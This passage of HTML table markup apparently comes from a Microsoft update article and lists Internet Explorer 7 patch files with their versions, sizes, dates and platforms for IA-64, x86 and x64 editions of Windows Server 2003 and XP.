class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">275,968</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">122,368</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">2,600,960</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">2,191,360</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">653,824</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,940,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wadvpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wextmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wicardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">643,312</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">480,768</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwebcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">293,168</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:43</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,280</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">22,016</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">508,416</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">314,368</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">207,360</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">485,376</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">85,504</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">84,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">195,584</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">267,776</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">7,116,800</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">983,552</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">250,368</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">57,344</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">371,712</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">720,112</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">2,077,184</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">5,737,472</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">763,904</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">242,688</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">164,864</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">64,000</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,441,280</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td 